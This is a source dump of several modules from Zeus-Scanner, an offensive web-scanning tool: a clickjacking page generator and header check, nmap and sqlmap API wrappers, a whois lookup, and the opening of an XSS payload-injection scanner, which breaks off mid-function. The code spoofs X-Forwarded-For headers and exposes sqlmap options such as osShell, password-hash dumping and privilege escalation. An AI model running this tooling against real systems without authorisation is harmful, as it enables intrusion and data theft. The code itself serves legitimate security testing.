10 | self.safe = lib.core.common.HTTP_HEADER.X_FRAME_OPT
11 | self.html = open(lib.core.settings.CLICKJACKING_TEST_PAGE_PATH).read()
12 |
13 | def generate_html(self):
14 | """
15 | generate the HTML page for the clickjacking test; it's up to you
16 | to put it into play
17 | """
18 | return self.html.format(self.url)
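# the template page presumably carries a single {} placeholder which format()
# fills with the target URL, yielding a page that frames the target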
19 |
20 | def extract_and_test_headers(self, **kwargs):
21 | """
22 | extract the headers from the url given to test if they contain the correct protection
23 | against clickjacking
24 | """
25 | proxy = kwargs.get("proxy", None)
26 | agent = kwargs.get("agent", None)
27 | forward = kwargs.get("forward", None)
28 | if forward is not None:
29 | ip_addrs = lib.core.settings.create_random_ip()
30 | headers = {
31 | lib.core.common.HTTP_HEADER.USER_AGENT: agent,
32 | lib.core.common.HTTP_HEADER.X_FORWARDED_FOR: "{}, {}, {}".format(
33 | ip_addrs[0], ip_addrs[1], ip_addrs[2]
34 | ),
35 | lib.core.common.HTTP_HEADER.CONNECTION: "close"
36 | }
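# spoofing X-Forwarded-For with three random addresses makes the request look
# like it was relayed through a chain of proxies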
37 | else:
38 | headers = {
39 | lib.core.common.HTTP_HEADER.USER_AGENT: agent,
40 | lib.core.common.HTTP_HEADER.CONNECTION: "close"
41 | }
42 | req, _, _, headers = lib.core.common.get_page(self.url, headers=headers, proxy=proxy)
43 | headers = req.headers
44 | if self.safe in headers:
45 | return False  # X-Frame-Options is present, framing is restricted
46 | return True  # header absent, the page is likely frameable
47 |
48 |
49 | def clickjacking_main(url, **kwargs):
50 | """
51 | main function for the clickjacking scan
52 | """
53 | agent = kwargs.get("agent", None)
54 | proxy = kwargs.get("proxy", None)
55 | forward = kwargs.get("forward", None)
56 | verbose = kwargs.get("verbose", False)
57 | batch = kwargs.get("batch", False)
58 |
59 | if not batch:
60 | if lib.core.settings.URL_QUERY_REGEX.match(url):
61 | question = lib.core.common.prompt(
62 | "it is recommended to use a URL without a GET(query) parameter, "
63 | "heuristic testing has detected that the URL provided contains a "
64 | "GET(query) parameter in it, would you like to continue", opts="yN"
65 | )
66 | if question.lower().startswith("n"):
67 | lib.core.settings.logger.info(lib.core.settings.set_color(
68 | "automatically removing all queries from URL"
69 | ))
70 | url = "http://{}".format(lib.core.settings.replace_http(url, complete=True))
71 |
72 | scanner = ClickJackingScanner(url)
73 |
74 | if verbose:
75 | lib.core.settings.logger.debug(lib.core.settings.set_color(
76 | "generating HTML", level=10
77 | ))
78 |
79 | data = scanner.generate_html()
80 |
81 | if verbose:
82 | lib.core.settings.logger.debug(lib.core.settings.set_color(
83 | "HTML generated successfully", level=10
84 | ))
85 | print("{}\n{}\n{}".format("-" * 30, data, "-" * 30))
86 |
87 | try:
88 | results = scanner.extract_and_test_headers(agent=agent, proxy=proxy, forward=forward)
89 |
90 | if results:
91 | lib.core.settings.logger.info(lib.core.settings.set_color(
92 | "it appears that provided URL '{}' is vulnerable to clickjacking, writing "
93 | "to HTML file".format(url), level=25
94 | ))
95 | lib.core.common.write_to_log_file(
96 | data,
97 | lib.core.settings.CLICKJACKING_RESULTS_PATH,
98 | lib.core.settings.CLICKJACKING_FILENAME.format(lib.core.settings.replace_http(url))
99 | )
100 | else:
101 | lib.core.settings.logger.error(lib.core.settings.set_color(
102 | "provided URL '{}' seems to have the correct protection from clickjacking".format(
103 | url
104 | ), level=40
105 | ))
106 | except KeyboardInterrupt:
107 | if not lib.core.common.pause():
108 | lib.core.common.shutdown()
109 | except Exception as e: # until I figure out the errors, we'll just make issues about them
110 | lib.core.settings.logger.exception(lib.core.settings.set_color(
111 | "Zeus failed to process the clickjacking test and received "
112 | "error code '{}'".format(e), level=50
113 | ))
114 | var.auto_issue.github.request_issue_creation()
115 |
--------------------------------------------------------------------------------
/lib/attacks/nmap_scan/__init__.py:
--------------------------------------------------------------------------------
1 | import json
2 | import socket
3 |
4 | import nmap
5 |
6 | import lib.core.common
7 | import lib.core.errors
8 | import lib.core.settings
9 | import lib.core.decorators
10 | from var.auto_issue.github import request_issue_creation
11 |
12 |
13 | class NmapHook(object):
14 |
15 | """
16 | Nmap API hook, uses python, must have nmap on your system
17 | """
18 |
19 | NM = nmap.PortScanner()
20 |
21 | def __init__(self, ip, **kwargs):
22 | self.ip = ip
23 | self.verbose = kwargs.get("verbose", False)
24 | self.pretty = kwargs.get("pretty", True)
25 | self.dir = lib.core.settings.PORT_SCAN_LOG_PATH
26 | self.file = lib.core.settings.NMAP_FILENAME
27 | self.opts = kwargs.get("opts", "")
28 |
29 | def get_all_info(self):
30 | """
31 | get all the information from the scan
32 | """
33 | if isinstance(self.opts, (list, tuple)):
34 | self.opts = ""
35 | scanned_data = self.NM.scan(self.ip, arguments=self.opts)
36 | if self.pretty:
37 | scanned_data = json.dumps(scanned_data, indent=4, sort_keys=True)
38 | return scanned_data
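# for reference, python-nmap hands back a dict shaped roughly like:
#   {"nmap": {"command_line": ..., "scaninfo": ...},
#    "scan": {"<ip>": {"hostnames": [...], "status": {...}, "tcp": {...}}}}
# which is what show_open_ports() below walks through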
39 |
40 | def send_to_file(self, data):
41 | """
42 | send all the information to a JSON file for further use
43 | """
44 | return lib.core.common.write_to_log_file(
45 | data, lib.core.settings.NMAP_LOG_FILE_PATH,
46 | lib.core.settings.NMAP_FILENAME.format(self.ip)
47 | )
48 |
49 | def show_open_ports(self, json_data, sep="-" * 30):
50 | """
51 | outputs the current scan information
52 | """
53 | # have to create a spacer or the output alignment comes out wrong
54 | spacer_data = {4: " " * 8, 6: " " * 6, 8: " " * 4}
55 | lib.core.settings.logger.info(lib.core.settings.set_color("finding data for IP '{}'".format(self.ip)))
56 | json_data = json.loads(json_data)["scan"]
57 | host = json_data[self.ip]["hostnames"][0]["name"]
58 | # treat an empty hostname as "unknown" in the banner below
59 | print(
60 | "{}\nScanned: {} ({})\tStatus: {}\nProtocol: {}\n".format(
61 | sep, self.ip,
62 | host if host else "unknown",
63 | json_data[self.ip]["status"]["state"],
64 | "TCP"
65 | )
66 | )
67 | oports = json_data[self.ip]["tcp"].keys()
68 | oports.sort()
69 | for port in oports:
70 | port_status = json_data[self.ip]["tcp"][port]["state"]
71 | # output the found port information..
72 | print(
73 | "Port: {}\tStatus: {}{}Type: {}".format(
74 | port, json_data[self.ip]["tcp"][port]["state"],
75 | spacer_data[len(port_status)],
76 | json_data[self.ip]["tcp"][port]["name"]
77 | )
78 | )
79 | print("{}".format(sep))
80 |
81 |
82 | def find_nmap(item_name="nmap"):
83 | """
84 | find nmap on the users system if they do not specify a path for it or it is not in their PATH
85 | """
86 | return lib.core.settings.find_application(item_name)
87 |
88 |
89 | def perform_port_scan(url, scanner=NmapHook, **kwargs):
90 | """
91 | main function that will initialize the port scanning
92 | """
93 | verbose = kwargs.get("verbose", False)
94 | opts = kwargs.get("opts", None)
95 | timeout_time = kwargs.get("timeout", None)
96 |
97 | if timeout_time is None:
98 | timeout_time = 120
99 |
100 | with lib.core.decorators.TimeOut(seconds=timeout_time):
101 | lib.core.settings.logger.warning(lib.core.settings.set_color(
102 | "if the port scan is not completed in {}(m) it will timeout".format(
103 | lib.core.settings.convert_to_minutes(timeout_time)
104 | ), level=30
105 | ))
106 | url = url.strip()
107 | lib.core.settings.logger.info(lib.core.settings.set_color(
108 | "attempting to find IP address for hostname '{}'".format(url)
109 | ))
110 |
111 | try:
112 | found_ip_address = socket.gethostbyname(url)
113 | except socket.gaierror:
114 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
115 | "failed to gather IP address for URL '{}'".format(url)
116 | ))
117 | return
118 |
119 | if verbose:
120 | lib.core.settings.logger.debug(lib.core.settings.set_color(
121 | "checking for nmap on your system", level=10
122 | ))
123 | nmap_exists = "".join(find_nmap())
124 | if nmap_exists:
125 | if verbose:
126 | lib.core.settings.logger.debug(lib.core.settings.set_color(
127 | "nmap has been found under '{}'".format(nmap_exists), level=10
128 | ))
129 | lib.core.settings.logger.info(lib.core.settings.set_color(
130 | "starting port scan on IP address '{}'".format(found_ip_address)
131 | ))
132 | try:
133 | data = scanner(found_ip_address, opts=opts)
134 | json_data = data.get_all_info()
135 | data.show_open_ports(json_data)
136 | file_path = data.send_to_file(json_data)
137 | lib.core.settings.logger.info(lib.core.settings.set_color(
138 | "port scan completed, all data saved to JSON file under '{}'".format(file_path)
139 | ))
140 | except KeyError:
141 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
142 | "no port information found for '{}({})'".format(
143 | url, found_ip_address
144 | ), level=50
145 | ))
146 | except KeyboardInterrupt:
147 | if not lib.core.common.pause():
148 | lib.core.common.shutdown()
149 | except lib.core.errors.PortScanTimeOutException:
150 | lib.core.settings.logger.error(lib.core.settings.set_color(
151 | "port scan is taking to long and has hit the timeout, you "
152 | "can increase this time by passing the --time-sec flag (IE "
153 | "--time-sec 300)", level=40
154 | ))
155 | except Exception as e:
156 | lib.core.settings.logger.exception(lib.core.settings.set_color(
157 | "ran into exception '{}', cannot continue quitting".format(e), level=50
158 | ))
159 | request_issue_creation()
160 | pass
161 | else:
162 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
163 | "nmap was not found on your system", level=50
164 | ))
165 | lib.core.common.run_fix(
166 | "would you like to automatically install it",
167 | "sudo sh {}".format(lib.core.settings.NMAP_INSTALLER_TOOL),
168 | "nmap is not installed, please install it in order to continue"
169 | )
--------------------------------------------------------------------------------
/lib/attacks/nmap_scan/nmap_opts.py:
--------------------------------------------------------------------------------
1 | NMAP_API_OPTS = {
2 | "-iL", "-iR", "--exclude", "--excludefile", "-sL",
3 | "-sn", "-Pn", "-PS", "-PA", "-PU", "-PY", "-PE",
4 | "-PP", "-PM", "-PO", "-n", "-R", "--dns-servers", "--system-dns",
5 | "--traceroute", "-sS", "-sT", "-sA", "-sW", "-sM", "-sU", "-sN",
6 | "-sF", "-sX", "--scanflags", "-sI", "-sY", "-sZ", "-sO", "-b",
7 | "-p", "--exclude-ports", "-F", "-r",
8 | "--top-ports", "--port-ratio", "-sV", "--version-intensity",
9 | "--version-light", "--version-all", "--version-trace", "-sC",
10 | "--script", "--script-args", "--script-args-file", "--script-trace",
11 | "--script-updatedb", "--script-help", "-O", "--osscan-limit",
12 | "--osscan-guess", "-T", "--min-hostgroup", "--max-hostgroup",
13 | "--min-parallelism", "--max-parallelism", "--min-rtt-timeout", "--max-rtt-timeout",
14 | "--initial-rtt-timeout", "--max-retries", "--host-timeout", "--scan-delay",
15 | "--max-scan-delay", "--min-rate", "--max-rate", "-f", "--mtu", "-D", "-S", "-e",
16 | "-g", "--source-port", "--proxies", "--data",
17 | "--data-string", "--data-length", "--ip-options", "--ttl",
18 | "--spoof-mac", "--badsum", "-oN", "-oX", "-oS", "-oG", "-oA", "-v",
19 | "-d", "--reason", "--open", "--packet-trace",
20 | "--iflist", "--append-output", "--resume", "--stylesheet",
21 | "--webxml", "--no-stylesheet", "-6", "-A",
22 | "--datadir", "--send-eth/--send-ip", "--privileged", "--unprivileged", "-V", "-h",
23 | }
24 |
--------------------------------------------------------------------------------
/lib/attacks/sqlmap_scan/__init__.py:
--------------------------------------------------------------------------------
1 | import json
2 | import re
3 | import subprocess
4 | import shlex
5 |
6 | try:
7 | import urllib2 # python 2
8 | except ImportError:
9 | import urllib.request as urllib2 # python 3
10 |
11 | import requests
12 |
13 | import lib.core.common
14 | import lib.core.settings
15 | import lib.core.errors
16 | import lib.attacks
17 |
18 | from var.auto_issue.github import request_issue_creation
19 |
20 |
21 | class SqlmapHook(object):
22 |
23 | """
24 | Sqlmap API hook, will process API requests, and output API data
25 | """
26 |
27 | def __init__(self, to_scan, port=None, api_con="http://127.0.0.1:{}", default_port=8775):
28 | self.to_scan = to_scan
29 | self.port = port or default_port
30 | self.headers = {"Content-Type": "application/json"}
31 | self.connection = api_con.format(self.port)
32 | self.commands = {
33 | "init": "/task/new",
34 | "id": "/admin/0/list",
35 | "start": "/scan/{}/start",
36 | "status": "/scan/{}/status",
37 | "log": "/scan/{}/log"
38 | }
39 |
40 | def init_new_scan(self):
41 | """
42 | create a new API scan
43 | """
44 | new_scan_url = "{}{}".format(self.connection, self.commands["init"])
45 | return requests.get(new_scan_url, params=self.headers)
46 |
47 | def get_scan_id(self, split_by=16):
48 | """
49 | get the ID of the current API scan
50 | """
51 | current_scan_id = None
52 | id_re = re.compile(r"[a-fA-F0-9]{16}")
53 | api_id_url = "{}{}".format(self.connection, self.commands["id"])
54 | req = requests.get(api_id_url)
55 | to_check = str(json.loads(req.content)["tasks"]).lower()
56 | found = ''.join(id_re.findall(to_check))
57 | if len(found) > 16:
58 | # split the found ID by 16 characters each time one is found to be over 16 characters
59 | # IE ['abcdee345593fffa', '2222aaa449837cc9']
60 | # if any of these items are not in the already used container, then chances are that's the
61 | # item we're looking for.
62 | # this will also allow you to go back to the same item more than once.
63 | data_found = [found[i:i+split_by] for i in range(0, len(found), split_by)]
64 | for item in data_found:
65 | if item not in lib.core.settings.ALREADY_USED:
66 | lib.core.settings.ALREADY_USED.add(item)
67 | current_scan_id = item
68 | else:
69 | lib.core.settings.ALREADY_USED.add(found)
70 | current_scan_id = found
71 | return current_scan_id
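# for context: the admin list endpoint replies with something like
#   {"tasks": {"abcdee345593fffa": "running"}}
# and the 16-hex-character regex above pulls the task IDs out of that blob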
72 |
73 | def start_scan(self, api_id, opts=None):
74 | """
75 | start the API scan
76 | """
77 | start_scan_url = "{}{}".format(self.connection, self.commands["start"].format(api_id))
78 | data_dict = {"url": self.to_scan}
79 | if opts is not None:
80 | for i in range(0, len(opts)):
81 | # if the options are passed they will be placed as a dict
82 | # IE {'level': 5, 'risk': 3}
83 | # from there they will be added into the post data dict what this
84 | # will accomplish is that it will take precedence over the already
85 | # set data on the sqlmap API client and replace that data with the
86 | # data that is provided.
87 | # IE
88 | # {
89 | # 'level': 1,
90 | # 'risk': 1,
91 | # }
92 | # will become
93 | # {
94 | # 'level': '5',
95 | # 'risk': '3',
96 | # }
97 | data_dict[opts[i][0]] = opts[i][1]
98 | post_data = json.dumps(data_dict)
99 | req = urllib2.Request(start_scan_url, data=post_data, headers=self.headers)
100 | return urllib2.urlopen(req)
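# the POSTed body is plain JSON, e.g. {"url": "http://target", "level": 5, "risk": 3};
# each (key, value) pair from opts overrides the sqlmap default for this task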
101 |
102 | def show_sqlmap_log(self, api_id):
103 | """
104 | show the sqlmap log during the API scan
105 | """
106 | running_status_url = "{}{}".format(self.connection, self.commands["status"].format(api_id))
107 | running_log_url = "{}{}".format(self.connection, self.commands["log"].format(api_id))
108 | status_req = requests.get(running_status_url)
109 | status_json = json.loads(status_req.content)
110 | current_status = status_json["status"]
111 | if current_status != "running":
112 | raise lib.core.errors.SqlmapFailedStart(
113 | "sqlmap API failed to start the run, check the client and see what "
114 | "the problem is and try again"
115 | )
116 | already_displayed = set()
117 | while current_status == "running":
118 | # while the current status evaluates to `running`
119 | # we can load the JSON data and output the log information
120 | # we will skip over information that has already been provided
121 | # by using the already displayed container set.
122 | # this will allow us to only output information that we
123 | # have not seen yet.
124 | current_status = json.loads(requests.get(running_status_url).content)["status"]
125 | log_req = requests.get(running_log_url)
126 | log_json = json.loads(log_req.content)
127 | for i in range(0, len(log_json["log"])):
128 | if log_json["log"][i]["message"] in already_displayed:
129 | pass
130 | else:
131 | print(
132 | "sqlmap> [{} {}] {}".format(
133 | log_json["log"][i]["time"],
134 | log_json["log"][i]["level"],
135 | log_json["log"][i]["message"]
136 | )
137 | )
138 | already_displayed.add(log_json["log"][i]["message"])
139 |
140 |
141 | def find_sqlmap(to_find="sqlmap"):
142 | """
143 | find sqlmap on the users system
144 | """
145 | found_path = lib.core.settings.find_application(to_find)
146 | return found_path
147 |
148 |
149 | def sqlmap_scan_main(url, port=None, verbose=None, opts=None, auto_start=False):
150 | """
151 | the main function that will be called and initialize everything
152 | """
153 |
154 | is_started = lib.core.settings.search_for_process("sqlmapapi.py")
155 | found_path = find_sqlmap()
156 |
157 | if auto_start:
158 | lib.core.settings.logger.info(lib.core.settings.set_color(
159 | "attempting to launch sqlmap API"
160 | ))
161 | sqlmap_api_command = shlex.split("sudo sh {} p {}".format(
162 | lib.core.settings.LAUNCH_SQLMAP_API_TOOL, "".join(found_path)
163 | ))
164 | subprocess.Popen(sqlmap_api_command, stdout=subprocess.PIPE)
165 | if lib.core.settings.search_for_process("sqlmapapi.py"):  # re-check after spawning the launcher
166 | lib.core.settings.logger.info(lib.core.settings.set_color(
167 | "sqlmap API is up and running, continuing process"
168 | ))
169 | else:
170 | lib.core.settings.logger.error(lib.core.settings.set_color(
171 | "there was a problem starting sqlmap API", level=40
172 | ))
173 | lib.core.common.prompt(
174 | "manually start the API and press enter when ready"
175 | )
176 | else:
177 | if not is_started:
178 | lib.core.common.prompt(
179 | "sqlmap API is not started, start it and press enter to continue"
180 | )
181 | try:
182 | sqlmap_scan = SqlmapHook(url, port=port)
183 | lib.core.settings.logger.info(lib.core.settings.set_color(
184 | "initializing new sqlmap scan with given URL '{}'".format(url)
185 | ))
186 | sqlmap_scan.init_new_scan()
187 | if verbose:
188 | lib.core.settings.logger.debug(lib.core.settings.set_color(
189 | "scan initialized", level=10
190 | ))
191 | lib.core.settings.logger.info(lib.core.settings.set_color(
192 | "gathering sqlmap API scan ID"
193 | ))
194 | api_id = sqlmap_scan.get_scan_id()
195 | if verbose:
196 | lib.core.settings.logger.debug(lib.core.settings.set_color(
197 | "current sqlmap scan ID: '{}'".format(api_id), level=10
198 | ))
199 | lib.core.settings.logger.info(lib.core.settings.set_color(
200 | "starting sqlmap scan on url: '{}'".format(url), level=25
201 | ))
202 | if opts:
203 | if verbose:
204 | lib.core.settings.logger.debug(lib.core.settings.set_color(
205 | "using arguments: '{}'".format(opts), level=10
206 | ))
207 | lib.core.settings.logger.info(lib.core.settings.set_color(
208 | "adding arguments to sqlmap API"
209 | ))
210 | else:
211 | if verbose:
212 | lib.core.settings.logger.debug(lib.core.settings.set_color(
213 | "no arguments passed, skipping", level=10
214 | ))
215 | lib.core.settings.logger.warning(lib.core.settings.set_color(
216 | "please keep in mind that this is the API, output will "
217 | "not be saved to log file, it may take a little longer "
218 | "to finish processing, launching sqlmap", level=30
219 | ))
220 | sqlmap_scan.start_scan(api_id, opts=opts)
221 | print("-" * 30)
222 | sqlmap_scan.show_sqlmap_log(api_id)
223 | print("-" * 30)
224 | except requests.exceptions.HTTPError as e:
225 | lib.core.settings.logger.exception(lib.core.settings.set_color(
226 | "ran into error '{}', seems you didn't start the server, check "
227 | "the server port and try again".format(e), level=50
228 | ))
229 | pass
230 | except KeyboardInterrupt:
231 | if not lib.core.common.pause():
232 | lib.core.common.shutdown()
233 | except Exception as e:
234 | if "HTTPConnectionPool(host='127.0.0.1'" in str(e):
235 | lib.core.settings.logger.error(lib.core.settings.set_color(
236 | "sqlmap API is not started, did you forget to start it? "
237 | "You will need to open a new terminal, cd into sqlmap, and "
238 | "run `python sqlmapapi.py -s` otherwise pass the correct flags "
239 | "to auto start the API", level=40
240 | ))
241 | pass
242 | else:
243 | lib.core.settings.logger.exception(lib.core.settings.set_color(
244 | "ran into error '{}', seems something went wrong, error has "
245 | "been saved to current log file.".format(e), level=50
246 | ))
247 | request_issue_creation()
248 | pass
249 |
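
The ID-chunking inside `get_scan_id` above is easier to see in isolation. A minimal sketch of that slicing step, using fabricated task IDs (the code above assumes the sqlmap API hands out 16-character hex task IDs):

    # standalone sketch of the slicing in SqlmapHook.get_scan_id; the two
    # task IDs below are made up for illustration
    split_by = 16
    found = "abcdee345593fffa2222aaa449837cc9"  # two 16-char IDs fused by the regex join
    data_found = [found[i:i + split_by] for i in range(0, len(found), split_by)]
    print(data_found)  # ['abcdee345593fffa', '2222aaa449837cc9']

    already_used = set()
    for item in data_found:
        if item not in already_used:
            already_used.add(item)
            current_scan_id = item  # the first ID not seen yet becomes the active scan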
--------------------------------------------------------------------------------
/lib/attacks/sqlmap_scan/sqlmap_opts.py:
--------------------------------------------------------------------------------
1 | SQLMAP_API_OPTIONS = {
2 | "crawlDepth", "osShell", "getUsers", "getPasswordHashes", "excludeSysDbs", "ignoreTimeouts",
3 | "regData", "prefix", "code", "googlePage", "skip", "query", "randomAgent", "osPwn", "authType",
4 | "safeUrl", "requestFile", "predictOutput", "wizard", "stopFail", "forms",
5 | "uChar", "pivotColumn", "dropSetCookie", "smart", "paramExclude", "risk",
6 | "sqlFile", "rParam", "getCurrentUser", "notString", "getRoles", "getPrivileges",
7 | "testParameter", "tbl", "charset", "trafficFile", "osSmb", "level",
8 | "dnsDomain", "skipStatic", "secondOrder", "outputDir", "skipWaf", "timeout",
9 | "firstChar", "torPort", "getComments", "binaryFields", "checkTor", "commonTables",
10 | "direct", "tmpPath", "titles", "getSchema", "identifyWaf", "paramDel",
11 | "safeReqFile", "regKey", "murphyRate", "limitStart", "crawlExclude", "flushSession",
12 | "loadCookies", "csvDel" ",", "offline", "method", "tmpDir", "disablePrecon",
13 | "osBof", "testSkip", "invalidLogical", "getCurrentDb", "hexConvert", "proxyFile",
14 | "answers", "host", "dependencies", "cookie", "proxy", "regType",
15 | "optimize", "limitStop", "search", "uFrom", "noCast", "testFilter",
16 | "ignoreCode", "eta", "csrfToken", "threads", "logFile", "os",
17 | "col", "rFile", "proxyCred", "verbose", "isDba", "updateAll",
18 | "privEsc", "forceDns", "getAll", "invalidBignum", "regexp", "getDbs",
19 | "freshQueries", "uCols", "smokeTest", "wFile", "udfInject", "invalidString",
20 | "tor", "forceSSL", "beep", "noEscape", "configFile", "scope",
21 | "authFile", "torType" "SOCKS5", "regVal", "dummy", "checkInternet", "safePost",
22 | "skipUrlEncode", "referer", "liveTest", "purgeOutput", "retries", "extensiveFp",
23 | "dumpTable", "getColumns", "batch", "headers", "authCred", "osCmd",
24 | "suffix", "dbmsCred", "regDel", "shLib", "sitemapUrl", "timeSec",
25 | "msfPath", "dumpAll", "getHostname", "sessionFile", "disableColoring", "getTables",
26 | "safeFreq", "agent", "webRoot", "lastChar", "string", "dbms",
27 | "dumpWhere", "tamper", "ignoreRedirects" "hpp", "runCase", "delay",
28 | "evalCode", "cleanup", "csrfUrl", "getBanner", "profile", "regRead",
29 | "bulkFile", "db", "excludeCol", "dumpFormat", "alert", "harFile",
30 | "Connection", "user", "parseErrors", "getCount", "dFile", "data",
31 | "regAdd", "ignoreProxy", "mobile", "googleDork", "saveConfig", "sqlShell",
32 | "tech", "textOnly", "cookieDel", "commonColumns", "keepAlive"
33 | }
34 |
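
Because `SQLMAP_API_OPTIONS` is a set, a caller can vet user-supplied option names with constant-time membership tests before posting them to the API. A hedged sketch (the `option_pairs` input is hypothetical, not an actual Zeus data structure):

    from lib.attacks.sqlmap_scan.sqlmap_opts import SQLMAP_API_OPTIONS

    # hypothetical user-supplied (name, value) pairs
    option_pairs = [("level", 5), ("risk", 3), ("notAnOption", 1)]
    valid = [(k, v) for k, v in option_pairs if k in SQLMAP_API_OPTIONS]
    rejected = [k for k, _ in option_pairs if k not in SQLMAP_API_OPTIONS]
    # valid    -> [('level', 5), ('risk', 3)]
    # rejected -> ['notAnOption']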
--------------------------------------------------------------------------------
/lib/attacks/whois_lookup/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/attacks/whois_lookup/__init__.py
--------------------------------------------------------------------------------
/lib/attacks/whois_lookup/whois.py:
--------------------------------------------------------------------------------
1 | import json
2 | import time
3 | import urllib2
4 |
5 | import lib.core.common
6 | import lib.core.settings
7 |
8 |
9 | def gather_raw_whois_info(domain):
10 | """
11 | get the raw JSON data from the whois API
12 | """
13 | auth_headers = {
14 | lib.core.common.HTTP_HEADER.CONTENT_TYPE: "application/json",
15 | lib.core.common.HTTP_HEADER.AUTHORIZATION: "Token {}".format(lib.core.settings.get_token(lib.core.settings.WHOIS_AUTH_PATH)),
16 | }
17 | request = urllib2.Request(
18 | lib.core.settings.WHOIS_JSON_LINK.format(domain), headers=auth_headers
19 | )
20 | data = urllib2.urlopen(request).read()
21 | _json_data = json.loads(data)
22 | return _json_data
23 |
24 |
25 | def _pretty_print_json(data, sort=True, indentation=4):
26 | return json.dumps(data, sort_keys=sort, indent=indentation)
27 |
28 |
29 | def get_interesting(raw_json):
30 | """
31 | return the interesting aspects of the whois lookup from the raw JSON data
32 | """
33 | nameservers = raw_json["nameservers"]
34 | user_contact = raw_json["contacts"]
35 | reg_info = raw_json["registrar"]
36 | return nameservers, user_contact, reg_info
37 |
38 |
39 | def human_readable_display(domain, interesting):
40 | """
41 | create a human readable display from the given whois lookup
42 | """
43 | data_sep = "-" * 30
44 | servers, contact, reg = interesting
45 | total_servers, total_contact, total_reg = len(servers), len(contact), len(reg)
46 | print(data_sep)
47 | print("[!] Domain {}".format(domain))
48 | if total_servers > 0:
49 | print("[!] Found a total of {} servers".format(total_servers))
50 | print(_pretty_print_json(servers))
51 | else:
52 | print("[x] No server information found")
53 | if total_contact > 0:
54 | print("[!] Found contact information")
55 | print(_pretty_print_json(contact))
56 | else:
57 | print("[x] No contact information found")
58 | if total_reg > 0:
59 | print("[!] Found register information")
60 | print(_pretty_print_json(reg))
61 | else:
62 | print("[x] No register information found")
63 | print(data_sep)
64 |
65 |
66 | def whois_lookup_main(domain, **kwargs):
67 | """
68 | main function
69 | """
70 | # sleep a little bit so that WhoIs doesn't stop us from making requests
71 | verbose = kwargs.get("verbose", False)
72 | timeout = kwargs.get("timeout", None)
73 | domain = lib.core.settings.replace_http(domain)
74 |
75 | try:
76 | lib.core.settings.logger.info(lib.core.settings.set_color(
77 | "performing WhoIs lookup on given domain '{}'".format(domain)
78 | ))
79 | if timeout is not None:
80 | time.sleep(timeout)
81 | try:
82 | raw_information = gather_raw_whois_info(domain)
83 | except Exception:
84 | lib.core.settings.logger.error(lib.core.settings.set_color(
85 | "unable to produce information from WhoIs lookup", level=40
86 | ))
87 | return None
88 | lib.core.settings.logger.info(lib.core.settings.set_color(
89 | "discovered raw information", level=25
90 | ))
91 | lib.core.settings.logger.info(lib.core.settings.set_color(
92 | "gathering interesting information"
93 | ))
94 | interesting_data = get_interesting(raw_information)
95 | if verbose:
96 | try:
97 | human_readable_display(domain, interesting_data)
98 | except Exception:
99 | lib.core.settings.logger.error(lib.core.settings.set_color(
100 | "unable to display any information from WhoIs lookup on domain '{}'".format(domain), level=50
101 | ))
102 | return None
103 | lib.core.common.write_to_log_file(
104 | raw_information, lib.core.settings.WHOIS_RESULTS_LOG_PATH,
105 | lib.core.settings.WHOIS_LOOKUP_FILENAME.format(domain)
106 | )
107 | except KeyboardInterrupt:
108 | if not lib.core.common.pause():
109 | lib.core.common.shutdown()
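
Taken together, the functions above form a small pipeline. A minimal usage sketch, assuming a valid API token sits at WHOIS_AUTH_PATH and using a placeholder domain:

    from lib.attacks.whois_lookup.whois import (
        gather_raw_whois_info, get_interesting, human_readable_display
    )

    raw = gather_raw_whois_info("example.com")   # authenticated JSON fetch
    human_readable_display("example.com", get_interesting(raw))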
--------------------------------------------------------------------------------
/lib/attacks/xss_scan/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 | import re
3 | import tempfile
4 | import importlib
5 | try:
6 | import urlparse # python 2
7 | except ImportError:
8 | import urllib.parse as urlparse # python 3
9 |
10 | import requests
11 |
12 | import lib.core.common
13 | import lib.core.settings
14 | import lib.core.decorators
15 | from lib.core.errors import InvalidTamperProvided
16 |
17 |
18 | def list_tamper_scripts(path="{}/lib/tamper_scripts"):
19 | """
20 | create a list of available tamper scripts from the tamper script directory
21 | """
22 | retval = set()
23 | exclude = ["__init__.py", ".pyc"]
24 | for item in os.listdir(path.format(os.getcwd())):
25 | if not any(f in item for f in exclude):
26 | item = item.split(".")[0]
27 | item = item.split("_")[0]
28 | retval.add(item)
29 | return retval
30 |
31 |
32 | def assign_protocol(url, force=False):
33 | auto_assign = ("http://{}", "https://{}")
34 | url_verification = re.compile(r"http(s)?", re.I)
35 |
36 | if url_verification.search(url) is None:
37 | if not force:
38 | return auto_assign[0].format(url)
39 | else:
40 | return auto_assign[1].format(url)
41 | else:
42 | return url
43 |
44 |
45 | def __tamper_payload(payload, tamper_type, warning=True, **kwargs):
46 | """
47 | add the tamper to the payload from the given tamper type
48 | """
49 | verbose = kwargs.get("verbose", False)
50 | acceptable = list_tamper_scripts()
51 | tamper_list = tamper_type.split(",")
52 | for tamper in tamper_list:
53 | if warning:
54 | if verbose:
55 | lib.core.settings.logger.debug(lib.core.settings.set_color(
56 | "tampering payload with '{}'".format(tamper), level=10
57 | ))
58 | if tamper in acceptable:
59 | tamper_name = "lib.tamper_scripts.{}_encode"
60 | tamper_script = importlib.import_module(tamper_name.format(tamper))
61 | payload = tamper_script.tamper(payload, warning=warning)
62 | else:
63 | raise InvalidTamperProvided()
64 | return payload
65 |
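
The dynamic dispatch above relies purely on the naming convention: a tamper name maps to `lib/tamper_scripts/<name>_encode.py`, and each script exposes a `tamper(payload, **kwargs)` callable. A short sketch of one manual round through that convention:

    import importlib

    # "base64" resolves to lib/tamper_scripts/base64_encode.py by convention
    tamper_script = importlib.import_module("lib.tamper_scripts.base64_encode")
    payload = tamper_script.tamper("<script>alert(1)</script>", warning=False)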
66 |
67 | def __load_payloads(filename="{}/etc/text_files/xss_payloads.txt"):
68 | """
69 | load the tamper payloads from the etc/xss_payloads file
70 | """
71 | with open(filename.format(os.getcwd())) as payloads:
72 | return payloads.readlines()
73 |
74 | def create_urls(url, payload_list, tamper=None, verbose=False, force=False):
75 | """
76 | create the tampered URLs, write them to a temporary file and read them from there
77 | """
78 | tf = tempfile.NamedTemporaryFile(delete=False)
79 | tf_name = tf.name
80 | with tf as tmp:
81 | for i, payload in enumerate(payload_list):
82 | if tamper:
83 | try:
84 | if i < 1:
